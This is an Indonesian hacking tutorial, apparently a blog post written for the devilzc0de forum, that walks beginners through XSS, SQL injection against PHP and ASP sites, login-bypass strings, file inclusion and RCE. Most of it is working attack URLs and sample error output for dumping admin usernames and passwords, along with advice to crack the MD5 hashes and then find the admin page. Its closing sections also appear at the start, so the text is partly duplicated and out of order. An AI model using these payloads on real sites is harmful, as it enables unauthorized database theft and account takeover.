emh apa yah...sebenernya sih pengertian ini w buat berdasarkan pengalaman w yah, masalahnya w mau cari referensi yang agak enak w pahamain pada sulit2..:p...akhirnya jad lah kesimpulan bypass menurut w...bypass adalah teknik hacking untuk login ke suatu site dengan memanfaatkan kesalahan dari si programmer di form login...
begitu kira2 menurut w brother...

ini sedikit list yang biasa di gunakan untuk bypass halaman website:

'or'
1'or'1'='1
having 1=1--
x'or'x'='x
dan masih banyak lagi silahkan anda kembangkan dan cari lagi, seperti biasa, in google..hehehe

0x05::File Inclusion

hello bro..ini dia kita memasuki tahap yang dibilang banyak dilakukan oleh para hacker indonesia yang sering main atau nongkrong di irc,hehehe :p
file inclusion ini terbagi 2 bagian:
1.Remote FIle Inclusion
2.Local File Inclusion

nah sini w bahas yang RFI dulu yah..

RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server. nah ngerti g tuh bro...jadi gampangnya gini loh...jadi dari luar server kita bisa melakukan kaya kita didalam server, nah gitu bro...

nah kemudian LFI

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.

nah disni saya akan memberikan bug terjadinya RFI dan LFI..

> [Penjelasan ]
< fungsi-fungsi yang dapat menyebabkan LFI/RFI:include(); include_once(); require(); require_once(); Dengan syarat pada konfigurasi php di server: allow_url_include = on allow_url_fopen = on magic_quotes_gpc = off contoh: misalkan kita punya file index.php dengan content kodenya seperti ini, Code: include "../$_GET[framefile]"; ?>

0x06::RCE (Remote Command Execution)

RCE...wah apa tuh baru denger nih...???? wah kaka, masa sih baru denger..ini adalah salah satu serang yang sering digunakan oleh attacker di indonesia juga..dari namanya juga kita pasti tahu apakah itu..itu adalaha bagaiman si attacker mampu menexecute perintah2 dengan meremote server yang vulnerable dari site

sebagai contoh saya bisa kasih link saja yah tentang RCE ini

untuk mencari RCE anda bisa buka
http://www.milw0rm.com/papers/369

untuk bermain RCE dengan LFI, loh bisa baca
http://www.milw0rm.com/papers/361
http://www.milw0rm.com/papers/260

nah sisanya anda cari lagi yang mengenai RCE, sebenernya RCE bukan hanya ada di bug LFI, tapi masih banyak lagi, seperti di phpmyadmin dan lain-lain..

sekian dari saya semoga bermanfaat adanya bro...

halo kawan-kawan semuanya, ini sebenernya gue pesembahkan buat devilzc0de yang sedang mengalami guncangan dari pihak asink(cie,cie bahasanya), maksudnya ini gue tulis ketika devilzc0de sedang mengalami suspend diforumnya, semoga ini cepat berlalu dan Devilzc0de cepet exist kembali, terima kasih buat temen2 yang udeh mau bantu berdirinya Devilzc0de sampe saat ini, w cinta loh semuanya, kita adalah familly.
ok, kawan2 langsung saja dari pada tunggu lama, tr malah kesel lagi lama2 w curhat...

oh yah, kenapa gue bisa pilih judul kaya diatas, karena ada buku yang judulnya web attack, nah disni gue cuma mempersimpel jah, bhkan ini basic sekali buat para pemula,bagi yang sudah bisa silahkan tidak usah dibaca tutorial cupu w ok, bagi yang mau baca silahkan aja.

dalam tutorial kali ini w akan membahas beberapa serangan yang sering dilakukan oleh para attacker web atau dengan kata lain tester web:

1.XSS (Cross site scripting)
2.basic SQL injection
3.SQL injection for ASP
4.bypass login
5.File Inclusion (RFI/LFI)
6.RCE (Remote Command Execution)

ok langsung saja kita menuju TKP juragan


0x01::XSS (cross site scripting)

nah loh apa itu??? itu adalah XSS (cross site scripting), wah kenapa namanya bukan jadi CSS???, wah pinter nih , gini loh karena CSS sendiri sudah memiliki arti yakni Cascading style sheet, nah nanti kalo pk singkatan itu jadi rancu donk,hehehe, yah pokoknya begitulah dari yang w pernah tahu n baca,kalo ada yang mau cari lagi silahkan jah kenapa namanya demikia, kalo w sih males, lebih baik langsung ngerti, xii,xii...

XSS adalah satu teknik web attack yang sangat mudah sekali dilakukan, ibaratnya, bug ini adalah sederhana karena attacker hanya menampilkan script yang tertulis di URL addressnya, wah gimana tuh...???? ok, langsung praktek saja

example:

http://namasite.com/aduh.php?xss=welcome+to+mysite

nah dari situ biasanya kita tahu baha web tesebut terkena vulnerable XSS, dari situ kita bisa memainkan URL tersebut menjadi:

example:

http://namasite.com/aduh.php?xss=alert(kamu ganteng deh)

nah nanti bisa kita rubah seperti itu,nanti setelah kita tekan enter maka akan keluar javascript alert dengan tulisan "kamu ganteng deh",hehehe


0x02::SQL injection

nah ini mungkin udeh pada tahu, atau mungkin udeh banyak yang mngerti metode ini, kalo udeh ada silahkan saja yah dilewadkan,, ini juga serangan attacker yang sering kali digunakan, karena masih banyak sekali site yang vulnerable dengan metode ini, sebelum lebih jauh membahas metode yang satu ini, g ada salahnya kita berkenalan dengan metode ini, karena ada pepatah, ga kenal maka g tahu(jayus loh..gpp yang penting metal..:p).

gini loh, sql injection adalah metode web attack dengan melakukan pemberian karakter2 khusus diURL target, jihaha, apalagi itu, saya g ngerti @#$%!@#...wets, sabar donk om, ini mau dikasih contoh, gini loh om, biasanya web tersebut di URLnya diberikan tanda quote,

example:

http://serang.org.sql.php?inject=20'

nah kan diberikan tanda petik tuh, kalo ada pesan error, berarti web tersebut vulnerable dengan sql injection

kemudian kita bisa mencari kolom keberapa yang mengalami masalah

example:

http://serang.org/sql.php?injection=10 order by 1--

example:

http://serang.org/sql.php?injection=10 order by 5--

atau juga bisa mencari dengan metode lain:

example:

http://serang.org/sql.php?injection=-10 union all select 1--

example:
http://serang.org/sql.php?injection=-10 union all select 1,2--

example:
http://serang.org/sql.php?injection=-10 union all select 1,2,3--

dan seterusnya

atau juga bisa

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1--

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2--

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2,3--

dan seterusnya sampe keluar kolom yang bermasalahnya ok...
nah kalo gitu, karena ini cuma contoh,kita anggap yang keluar adalah kolom ke 3

setelah itu kita bisa mengecek versi sqlnya

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,version(),4,5--

atau

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--

kalo seandainya yang keluar versi 4.x.x, maka lewadkan saja, kalo mau dipaksa bisa sih, tapi harus tebak2 tabel dan kolom,hehehe, kalo seandainya yang keluar versi 5.x.x , mari lanjutkan.

untuk mencari tabel yang terdapat dalam site tersebut

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--

inget file yang penting adalah:

>>group_concat(table_name)<< == untuk mencari table dari database yang ada.

>>from information_schema.tables where table_schema=database << == diletakan di angka terakhir yang kita dapatkan (lihad contoh diatas)

ok, sekarang kita dapet tabelnya nih, misalnya isi tabelnya sebagai berikut:
admin
user
forum
berita
polling

nah stelah dapet itu selanjutnya kita harus tahu, apa saja sih yang ada didalam tabel itu, tapi tabel yang ingin dicari harus terlebih dahulu kita konvert ke ASCII

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--

61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII

setelah kita dapet kolomnya, sekarang saatnya kita dump itu kolom, misalkan kolom yang terdapat pada tabel adalah:
id
username
password
email

nah kan udeh tahu kan, dumping deh

example:

http://serang.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email) from admin--

nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak ko crackan buat md5 yang online tool sekarang..kalo saya sih lebih suka pake toolnya si gunslinger yang md5 cracking, enak tuh...sering dapet..sekalian w promosiin gunslinger tool loh, ok, setelah berhasil di crack atau dapet password dan usernamenya, silahkan cari halaman adminnya, kalo males, pk tool adminpagefinder dari gunslinger juga, sayang toolnya lum bisa update pagenya...hehe, tr kapan2 kita renov ya gunslinger.

0x03::SQL injection for ASP

sebernernya ini sama saja dengan metode SQL injection yang diatas, tapi bedanya hanya dibahasa yang digunakan, kalo yang diatas biasa di pk untuk *.php dan kalo yang ini untuk *.asp..

example:

http://inject.web.id/sql.asp?injection=12'

kalo muncul pesan error kaya gini "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/news.asp, line 52" berarti bisa kita lanjutkan, selain dari itu, coba2 ajah ok...hehehehe :p

lanjutkan dengan

example:

http://inject.web.id/sql.asp?injection=12' HAVING 1=1--

error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."

cari lagi table dan kolomnya

example:

http://inject.web.id/sql.asp?injection=12' GROUP BY news.news_id HAVING 1=1--

error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."

Error menunjukkan nama column yang ketiga adalah "news_detail"
Untuk mencari nama column yang seterusnya, lakukan seperti langkah selanjutnya dengan menambahkan urutan nama-nama column.
Jika pada akhirnya tidak muncul error, berarti sudah tidak ada lagi column yang di dalam table.

Selanjutnya kita akan menggunakan metode yang lain untuk memanfaatkan error MSSQL dengan command "convert".
Contoh command yang akan ditambahkan diakhir URL (setelah parameter id) adalah: +and+1=convert(int,perintah)--
contoh kita akan melihat versi server:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,@@version)--

Pesan error yang muncul:

Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
/page.asp, line 9

Dari error tersebut kita mengetahui versi Microsoft SQL dan OS-nya.

Untuk mencari nama databasenya

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,db_name())--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9

Berdasarkan error maka dapat diketahui bahwa nama database adalah "cwhdb"

Untuk melihat user yang sementara menggunakan database gunakan command user_name(). contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,user_name())--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9

Error menunjukkan bahwa user adalah "sa"

Sekarang adalah bagaimana mencari nama table, nama column, dan isinya, dari table information_schema. Perintahnya: +and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- >>contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9

Dari query tersebut, dapat diketahui bahwa "threads" sebagai tipe data nvarchar dan tidak bisa diconvert ke data tipe int, maka menghasilkan error.
Dan dengan error tersebut, menunjukkan table yang pertama adalah table "threads".
Selanjutnya mencari table yang kedua. Dengan menambahkan perintah WHERE. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')))--

/*Penjelasan perintah tersebut, yaitu kita akan mengambil informasi dari table information_schema dimana/dengan nama table tidak/bukan "threads". Atau dengan kata lain kita akan mencari table yang selain table "threads"*/
Maka akan muncul error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9

Error menunjukkan table yang kedua adalah "users". Untuk mencari table yang lain, hanya tambahkan nama table yang telah diketahui. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')))--

Error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9

Yang berarti nama table yang ketiga adalah table "forums"
Namun jika error yang tampil seperti ini:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10

Maka menandakan bahwa semua table telah ditampilkan dan sudah tidak ada lagi table yang lain.

Selanjutnya mencari nama column dari table. Metodenya hampir sama dengan yang sebelumnya, yaitu masih mencari dari "information_schema" namun perintahnya dari "information_schema.tables" berubah menjadi "information_schema.columns" dan dari "table_name" berubah menjadi "column_name". contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--

Menampilkan error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9

Dan berdasarkan error diketahui isi column pertama dari table "users" adalah column "uname".
Untuk mencari column yang lain gunakan perintah di akhir URL: and+column_name+not+in+('uname'). contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')))--

Menghasilkan error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9

Berdasarkan error, column yang kedua adalah column "upass" yang terdapat dari table "user".
Untuk mencari column yang lain, tambahkan nama column yang telah kita ketahui sebelumnya. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')))--

Muncul error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9

Berarti column yang ketiga adalah column "email".
Tetapi jika error yang dihasilkan adalah:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10

Itu menandakan bahwa sudah tidak ada lagi column yang lain.

Last step, adalah mencari isi dari column yang telah kita ketahui. Seperti ini:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users))--

Error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9

Berarti isi dari column "uname" yang berada di table "users" datanya adalah "admin".
Untuk mencari user yang lain, gunakan data yang telah kita ketahui. contoh:

example:

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--

Jika error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9

Berarti username yang lain adalah "cwh". Dan untuk mencari user yang berikutnya, tambahkan username yang telah diketahui. contoh:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--

Dan jika errornya:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/showthread.asp, line 10

Berarti hanya ada 2 user yaitu "admin" dan "cwh".

Dan untuk mencari passwordnya, perintahnya seperti:

example:

http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+upass+from+users))--

Dan jika error yang ditampilkan adalah:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value '123' to data type int.
/page.asp, line 9

Maka isi dari data yang pertama di column "upass" adalah "123".
Dari hasil yang kita dapat diatas, isi data pertama dari column "uname" adalah "admin", dan isi data pertama dari column "upass" adalah "123".
Berarti usernamenya adalah "admin" dan passwordnya "123"

0x04::bypass Login

emh apa yah...sebenernya sih pengertian ini w buat berdasarkan pengalaman w yah, masalahnya w mau cari referensi yang agak enak w pahamain pada sulit2..:p...akhirnya jad lah kesimpulan bypass menurut w...bypass adalah teknik hacking untuk login ke suatu site dengan memanfaatkan kesalahan dari si programmer di form login...
begitu kira2 menurut w brother...

ini sedikit list yang biasa di gunakan untuk bypass halaman website:

'or'
1'or'1'='1
having 1=1--
x'or'x'='x
dan masih banyak lagi silahkan anda kembangkan dan cari lagi, seperti biasa, in google..hehehe

0x05::File Inclusion

hello bro..ini dia kita memasuki tahap yang dibilang banyak dilakukan oleh para hacker indonesia yang sering main atau nongkrong di irc,hehehe :p
file inclusion ini terbagi 2 bagian:
1.Remote FIle Inclusion
2.Local File Inclusion

nah sini w bahas yang RFI dulu yah..

RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server. nah ngerti g tuh bro...jadi gampangnya gini loh...jadi dari luar server kita bisa melakukan kaya kita didalam server, nah gitu bro...

nah kemudian LFI

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.

nah disni saya akan memberikan bug terjadinya RFI dan LFI..

> [Penjelasan ]
< fungsi-fungsi yang dapat menyebabkan LFI/RFI:include(); include_once(); require(); require_once(); Dengan syarat pada konfigurasi php di server: allow_url_include = on allow_url_fopen = on magic_quotes_gpc = off contoh: misalkan kita punya file index.php dengan content kodenya seperti ini, Code: include "../$_GET[framefile]"; ?>

0x06::RCE (Remote Command Execution)

RCE...wah apa tuh baru denger nih...???? wah kaka, masa sih baru denger..ini adalah salah satu serang yang sering digunakan oleh attacker di indonesia juga..dari namanya juga kita pasti tahu apakah itu..itu adalaha bagaiman si attacker mampu menexecute perintah2 dengan meremote server yang vulnerable dari site

sebagai contoh saya bisa kasih link saja yah tentang RCE ini

untuk mencari RCE anda bisa buka
http://www.milw0rm.com/papers/369

untuk bermain RCE dengan LFI, loh bisa baca
http://www.milw0rm.com/papers/361
http://www.milw0rm.com/papers/260

nah sisanya anda cari lagi yang mengenai RCE, sebenernya RCE bukan hanya ada di bug LFI, tapi masih banyak lagi, seperti di phpmyadmin dan lain-lain..

sekian dari saya semoga bermanfaat adanya bro...
(+) Baca Selanjutnya...

Template by : kendhin x-template.blogspot.com